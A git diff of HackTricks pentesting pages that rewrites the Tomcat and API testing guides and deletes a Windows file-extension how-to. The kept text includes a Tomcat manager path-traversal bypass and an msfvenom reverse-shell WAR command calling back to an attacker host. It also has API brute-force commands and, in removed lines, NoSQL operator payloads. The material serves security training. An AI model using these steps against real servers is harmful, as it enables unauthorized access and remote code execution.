+### **Double URL Encoding**
+The CVE-2007-1860 vulnerability in `mod_jk` allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.
 
-### Double URL encode
-
-A well-known vulnerability _to_ access the application manager \_\_ is mod\_jk in CVE-2007-1860, that allows **Double URL encode path traversal.**
-
-In order to access to the management web of the Tomcat go to: _pathTomcat/%252E%252E/manager/html_
-
-Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.\
-To access to backdoor you might also need to use the double urlencode trick.
+In order to access to the management web of the Tomcat go to: `pathTomcat/%252E%252E/manager/html`
 
 ### /examples
-
-The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).
+Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
 
 * /examples/jsp/num/numguess.jsp
 * /examples/jsp/dates/date.jsp
@@ -121,14 +104,14 @@ The following example scripts that come with Apache Tomcat v4.x - v7.x and can b
 * /examples/servlet/SessionExample
 * /tomcat-docs/appdev/sample/web/hello.jsp
 
-### Path Traversal (..;/)
-
+### **Path Traversal Exploit**
 In some [**vulnerable configurations of Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can gain access to protected directories in Tomcat using the path: `/..;/`
 
 So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html`
 
 **Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
 
+
 ## RCE
 
 Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
@@ -160,11 +143,13 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
 
 ### MSFVenom Reverse Shell
 
+1. Create the war to deploy:
+
 ```bash
 msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
 ```
 
-Then, **upload the `revshell.war` file and access to it (**_**/revshell/**_**)**
+2. Upload the `revshell.war` file and access to it (`/revshell/`):
 
 ### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
 
@@ -261,6 +246,11 @@ msf> use post/windows/gather/enum_tomcat
 
 * [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
 
+## References
+* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
+* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
+
+
 <details>
 
 <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
@@ -275,7 +265,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md
index 04d7dd1fc..a35b6e455 100644
--- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md
+++ b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -171,7 +171,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md
index bca3488b5..4141ac978 100644
--- a/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -21,208 +21,69 @@ Get Access Today:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-## Basic Information
 
-Main:
+## API Pentesting Methodology Summary
 
-* **Web Services (SOAP/XML)**
-  * The documentation uses **WSDL** format and is usually saved in the `?wsdl` path like `https://api.example.com/api/?wsdl`
-  * An example of this documentation can be found in [http://www.dneonline.com/calculator.asmx](http://www.dneonline.com/calculator.asmx) (WSDL document in [http://www.dneonline.com/calculator.asmx?wsdl](http://www.dneonline.com/calculator.asmx?wsdl)) and you can see an example request calling the `Add` method in [http://www.dneonline.com/calculator.asmx?op=Add](http://www.dneonline.com/calculator.asmx?op=Add)
-  * For parsing these files and create example requests you and use the tool **SOAPUI** or the **WSDLer** Burp Suite Extension.
-* **REST APIs (JSON)**
-  * The standard documentation is the WADL file. Find an example here: [https://www.w3.org/Submission/wadl/](https://www.w3.org/Submission/wadl/). However, there are other more developer friendly API representation engines like [https://swagger.io/tools/swagger-ui/](https://swagger.io/tools/swagger-ui/) (check the demo in the page)
-  * For parsing these files and create example requests you an use the tool **Postman**
-* [**GraphQL**](graphql.md)
+Pentesting APIs involves a structured approach to uncovering vulnerabilities. This guide encapsulates a comprehensive methodology, emphasizing practical techniques and tools.
 
-## Labs
+### **Understanding API Types**
 
-* [**VAmPI**](https://github.com/erev0s/VAmPI)**:** VAmPI is a vulnerable API made with Flask and it includes vulnerabilities from the OWASP top 10 vulnerabilities for APIs.
+- **SOAP/XML Web Services**: Utilize the WSDL format for documentation, typically found at `?wsdl` paths. Tools like **SOAPUI** and **WSDLer** (Burp Suite Extension) are instrumental for parsing and generating requests. Example documentation is accessible at [DNE Online](http://www.dneonline.com/calculator.asmx).
 
-## Tricks
+- **REST APIs (JSON)**: Documentation often comes in WADL files, yet tools like [Swagger UI](https://swagger.io/tools/swagger-ui/) provide a more user-friendly interface for interaction. **Postman** is a valuable tool for creating and managing example requests.
 
-### SOAP/XML
+- **GraphQL**: A query language for APIs offering a complete and understandable description of the data in your API.
 
-These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-xml-external-entity.md), but usually **DTD Declarations** are **disallowed** in the input from the user.
+### **Practice Labs**
 
-You could also try to use CDATA tags to insert payloads (as long as the XML is valid)
+- [**VAmPI**](https://github.com/erev0s/VAmPI): A deliberately vulnerable API for hands-on practice, covering the OWASP top 10 API vulnerabilities.
 
-![](<../../.gitbook/assets/image (534).png>)
+### **Effective Tricks for API Pentesting**
 
-### Check Access
+- **SOAP/XML Vulnerabilities**: Explore XXE vulnerabilities, although DTD declarations are often restricted. CDATA tags may allow payload insertion if the XML remains valid.
 
-Usually some API endpoints are gong to need more privileges that others. Always try to access the more privileged endpoints from less privileged (unauthorized) accounts to see if it's possible.
+- **Privilege Escalation**: Test endpoints with varying privilege levels to identify unauthorized access possibilities.
 
-### CORS
+- **CORS Misconfigurations**: Investigate CORS settings for potential exploitability through CSRF attacks from authenticated sessions.
 
-Always check the [**CORS**](../../pentesting-web/cors-bypass.md) configuration of the API, as if its allowing to end request with the credentials from the attacker domain, a lot of damage can be done via [**CSRF**](../../pentesting-web/csrf-cross-site-request-forgery.md) from authenticated victims.
+- **Endpoint Discovery**: Leverage API patterns to discover hidden endpoints. Tools like fuzzers can automate this process.
 
-### Patterns
+- **Parameter Tampering**: Experiment with adding or replacing parameters in requests to access unauthorized data or functionalities.
 
-Search for API patterns inside the api and try to use it to discover more.\
-If you find _/api/albums/**\<album\_id>**/photos/**\<photo\_id>**_\*\* \*\* you could try also things like _/api/**posts**/\<post\_id>/**comment**/_. Use some fuzzer to discover this new endpoints.
+- **HTTP Method Testing**: Vary request methods (GET, POST, PUT, DELETE, PATCH) to uncover unexpected behaviors or information disclosures.
 
-### Add parameters
+- **Content-Type Manipulation**: Switch between different content types (x-www-form-urlencoded, application/xml, application/json) to test for parsing issues or vulnerabilities.
 
-Something like the following example might get you access to another user’s photo album:\
-_/api/MyPictureList → /api/MyPictureList?**user\_id=\<other\_user\_id>**_
+- **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing.
 
-### Replace parameters
+- **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions.
 
-You can try to **fuzz parameters** or **use** parameters **you have seen** in a different endpoints to try to access other information
-
-For example, if you see something like: _/api/albums?**album\_id=\<album id>**_
-
-You could **replace** the **`album_id`** parameter with something completely different and potentially get other data: _/api/albums?**account\_id=\<account id>**_
-
-### Parameter pollution
-
-/api/account?**id=\<your account id>** → /api/account?**id=\<your account id>\&id=\<admin's account id>**
-
-### Wildcard parameter
-
-Try to use the following symbols as wildcards: **\***, **%**, **\_**, **.**
-
-* /api/users/\*
-* /api/users/%
-* /api/users/\_
-* /api/users/.
-
-### HTTP request method change
-
-You can try to use the HTTP methods: **GET, POST, PUT, DELETE, PATCH, INVENTED** to try check if the web server gives you unexpected information with them.
-
-### Request content-type
-
-Try to play between the following content-types (bodifying acordinly the request body) to make the web server behave unexpectedly:
-
-* **x-www-form-urlencoded** --> user=test
-* **application/xml** --> \<user>test\</user>
-* **application/json** --> {"user": "test"}
-
-### Parameters types
-
-If **JSON** data is working try so send unexpected data types like:
-
-* {"username": "John"}
-* {"username": true}
-* {"username": null}
-* {"username": 1}
-* {"username": \[true]}
-* {"username": \["John", true]}
-* {"username": {"$neq": "lalala"\}}
-* any other combination you may imagine
-
-If you can send **XML** data, check for [XXE injections](../../pentesting-web/xxe-xee-xml-external-entity.md).
-
-If you send regular POST data, try to send arrays and dictionaries:
-
-* username\[]=John
-* username\[$neq]=lalala
-
-### Play with routes
-
-`/files/..%2f..%2f + victim ID + %2f + victim filename`
-
-### Check possible versions
-
-Old versions may be still be in use and be more vulnerable than latest endpoints
-
-* `/api/v1/login`
-* `/api/v2/login`\\
-* `/api/CharityEventFeb2020/user/pp/<ID>`
-* `/api/CharityEventFeb2021/user/pp/<ID>`
-
-### Check possible versions (automated approach)
-
-AutoRepeater Burp Extension: Add a replacement rule
-
-* `Type: Request String`
-* `Match: v2 (higher version)`
-* `Replace: v1 (lower version)`
-
-## 🛡️ API Security Empire Cheat Sheet
-
-\
-Cheat Sheet Author: [Momen Eldawakhly (Cyber Guy)](https://www.linkedin.com/in/momen-eldawakhly-3b6250204)\
-\
-In this repository you will find: Mindmaps, tips & tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!!
-
-### 🚪 First gate: `{{Recon}}`
-
-The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon:
-
-\
-![](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.png)
-
-[**PDF Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.pdf) **|** [**XMind Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.xmind)
-
-#### ⚔️ Weapons you will need:
-
-* [BurpSuite](https://portswigger.net/burp/releases)
-* [FFUF](https://github.com/ffuf/ffuf)
-* [Arjun](https://github.com/InsiderPhD/Arjun)
-* [Postman](https://www.postman.com/downloads/)
-* [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
-* [FuzzDB](https://github.com/fuzzdb-project/fuzzdb)
-* [SoapUI](https://www.soapui.org/downloads/soapui/)
-* [GraphQL Voyager](https://apis.guru/graphql-voyager/)
-* [Kiterunner](https://github.com/assetnote/kiterunner)
-* [unfurl](https://github.com/tomnomnom/unfurl)
-
-#### 🏋️ Test your abilities and weapons:
-
-* [vapi](https://github.com/roottusk/vapi)
-* [Generic-University](https://github.com/InsiderPhD/Generic-University)
-
-### 🚪 Second gate: `{{Attacking}}`
-
-#### Attacking RESTful & SOAP:
-
-![](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20ATTACK.png)\
-[**PDF Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20ATTACK.pdf) **|** [**XMind Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20ATTACK.xmind)\\
-
-#### Attacking GraphQL:
-
-Due to the limited attacks in the GraphQL we tried to generate all the possible attacks due to our experience in testing APIs in the coming mindmap:
-
-![](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20%7B%7BGraphQL%20Attacking%7D%7D.png)\
-[**PDF Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20%7B%7BGraphQL%20Attacking%7D%7D.pdf) **|** [**XMind Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap%20%7B%7BGraphQL%20Attacking%7D%7D.xmind)\\
-
-## Owasp API Security Top 10
-
-Read this document to learn how to **search** and **exploit** Owasp Top 10 API vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)
-
-## API Security Checklist
-
-{% embed url="https://github.com/shieldfy/API-Security-Checklist" %}
-
-## Logger++ Filters for Hunting API Vulnerabilities
-
-[https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)
-
-## List of possible API endpoints
-
-[https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)
-
-## Tools
-
-* [**kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints.**
+### **Tools and Resources for API Pentesting**
 
+- **kiterunner**: Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs.
 ```bash
-kr scan https://domain.com/api/ -w routes-large.kite -x 20 # Downloaded from kiterunner repo
+kr scan https://domain.com/api/ -w routes-large.kite -x 20
 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
 kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
 kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ```
 
-* [**automatic-api-attack-tool**](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output.
-* [**Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing to find several different web vulnerabilities.
-* [**Susanoo**](https://github.com/ant4g0nist/Susanoo): Vulnerability API scanner.
-* [**restler-fuzzer**](https://github.com/microsoft/restler-fuzzer): RESTler is the _first stateful REST API fuzzing tool_ for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. For a given cloud service with an OpenAPI/Swagger specification, RESTler analyzes its entire specification, and then generates and executes tests that exercise the service through its REST API.
-* [**TnT-Fuzzer**](https://github.com/Teebytes/TnT-Fuzzer)**:** TnT-Fuzzer is an OpenAPI (swagger) fuzzer written in python.
-* [**APIFuzzer**](https://github.com/KissPeter/APIFuzzer)**:** APIFuzzer reads your API description and step by step fuzzes the fields to validate if you application can cope with the fuzzed parameters.
-* [**API-fuzzer**](https://github.com/Fuzzapi/API-fuzzer): API\_Fuzzer gem accepts a API request as input and returns vulnerabilities possible in the API.
-* [**race-the-web**](https://github.com/TheHackerDev/race-the-web): Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) _simultaneously_, and then compares the responses from the server for uniqueness.
+- Additional tools like **automatic-api-attack-tool**, **Astra**, and **restler-fuzzer** offer tailored functionalities for API security testing, ranging from attack simulation to fuzzing and vulnerability scanning.
+
+### **Learning and Practice Resources**
+
+- **OWASP API Security Top 10**: Essential reading for understanding common API vulnerabilities ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)).
+
+- **API Security Checklist**: A comprehensive checklist for securing APIs ([GitHub link](https://github.com/shieldfy/API-Security-Checklist)).
+
+- **Logger++ Filters**: For hunting API vulnerabilities, Logger++ offers useful filters ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)).
+
+- **API Endpoints List**: A curated list of potential API endpoints for testing purposes ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)).
+
+
+## References
+* [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
+
 
 <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
diff --git a/pentesting-web/abusing-hop-by-hop-headers.md b/pentesting-web/abusing-hop-by-hop-headers.md
index bf05da284..0bf7370d6 100644
--- a/pentesting-web/abusing-hop-by-hop-headers.md
+++ b/pentesting-web/abusing-hop-by-hop-headers.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -48,7 +48,7 @@ If a cache server incorrectly caches content based on hop-by-hop headers, an att
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md
index 34a06ca79..765cadea9 100644
--- a/pentesting-web/dependency-confusion.md
+++ b/pentesting-web/dependency-confusion.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -58,7 +58,7 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md
index 969eb802d..fb1d458ad 100644
--- a/pentesting-web/domain-subdomain-takeover.md
+++ b/pentesting-web/domain-subdomain-takeover.md
@@ -91,7 +91,7 @@ Mitigation strategies include:
 
 For cloud providers, verifying domain ownership is crucial to prevent subdomain takeovers. Some, like [GitLab](https://about.gitlab.com/2018/02/05/gitlab-pages-custom-domain-validation/), have recognized this issue and implemented domain verification mechanisms.
 
-# References
+## References
 * [https://0xpatrik.com/subdomain-takeover/](https://0xpatrik.com/subdomain-takeover/)
 
 <figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
diff --git a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
deleted file mode 100644
index d02033fd5..000000000
--- a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
+++ /dev/null
@@ -1,76 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-## How to Show File Extensions in Windows XP
-
-1. Open Windows Explorer. You can do this by clicking "My Computer" from the Start Menu. Note that this is NOT the same thing as Internet Explorer.
-2. Click the "Tools" menu on the menu bar in Explorer (the menu bar is at the top of the Explorer window, underneath the window title). Click the "Folder Options" item in the popup menu that appears.
-3. A dialog box appears. Click the "View" tab at the top of the window.
-4. Look for a setting "Hide file extensions for known file types" and uncheck the box beside it to disable it.
-5. Click the button "Apply to All Folders". Then click "Apply" and then "OK".
-
-## Displaying the File Extension in Windows Vista and Windows 7
-
-1. Click the Start menu. This is the round icon that is on the bottom left corner of your screen.
-2. Type "folder options" (without the quotes). Click the line "Folder Options" that appears at the top of the Start menu.
-3. A dialog box with the title "Folder Options" will appear. Click the "View" tab at the top of the window.
-4. Click to uncheck the box for "Hide extensions for known file types".
-5. Click the "OK" button at the bottom of the dialog box.
-
-## How to Show File Extensions in Windows 8
-
-1. Invoke the start screen. One way to do this is to move your mouse to the bottom left corner of your screen. In Windows 8, there's no indication that this will cause the start screen to appear, but it will.
-2. Type "folder options" (without the quotes). I know that there is no blank field in the start screen to suggest that you can actually type anything. Like many things in Windows 8, arcane knowledge is needed to operate the system.
-3.  On the left side of the screen, you will get the disappointing message "No apps match your search". The start screen search facility in Windows 8 can only find something for you if you already know where to find it and can tell it where it is.
-
-    Click the line "Settings" on the right side of the screen.
-4. The left side of the screen now shows "Folder Options" as one of the possible results. Click it.
-5. A window with the title "Folder Options" will appear. Click the "View" tab at the top of that dialog box.
-6. Look for the line "Hide extensions of known file types" and click the box beside it to remove the tick.
-7. Click the "OK" button.
-
-## How to Show File Extensions in Windows 10
-
-1. Click the icon on the task bar at the bottom of the screen to invoke the Start menu. (The icon is the one that looks like a white version of the Windows logo.)
-2. Type "folder options" (without the quotation marks). There is no blank field on the screen to suggest that you can type anything, but you can. Just type it.
-3. Click the "File Explorer Options" item that appears in the "Best match" list that appears.
-4. A dialog box with the title "File Explorer Options" will appear. Click the "View" tab at the top of the window.
-5. Scroll to find the item "Hide extensions for known file types" and click the box next to it to remove the tick.
-6. Click the "OK" button.
-
-That's it. You should now be able to see the true extensions of the files in your Explorer windows.
-
-Copyright © 2008-2018 by Christopher Heng. All rights reserved. Get more "How To" guides and tutorials from [https://www.howtohaven.com/](https://www.howtohaven.com).
-
-**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
-
-
-<details>
-
